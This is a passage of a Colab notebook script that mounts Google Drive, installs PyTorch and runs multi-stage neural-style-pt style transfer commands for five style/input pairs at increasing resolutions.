print('Not using a high-RAM runtime')
else:
print('You are using a high-RAM runtime!')
from google.colab import drive
drive.mount('/content/gdrive')
!git clone https://github.com/ProGamerGov/neural-style-pt.git
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/channel_pruning.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nin_imagenet.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg16-00b39a1b.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg19-d01eb7cb.pth" /content/neural-style-pt/models/
!pip install torch==1.7.1+cu101 torchvision==0.8.2+cu101 torchaudio===0.7.2 -f https://download.pytorch.org/whl/torch_stable.html
#---------#
# STYLE 1 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/1A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 2 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/2A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 3 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/3A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 4 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/4A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 5 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/5A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 6 #
#---------#
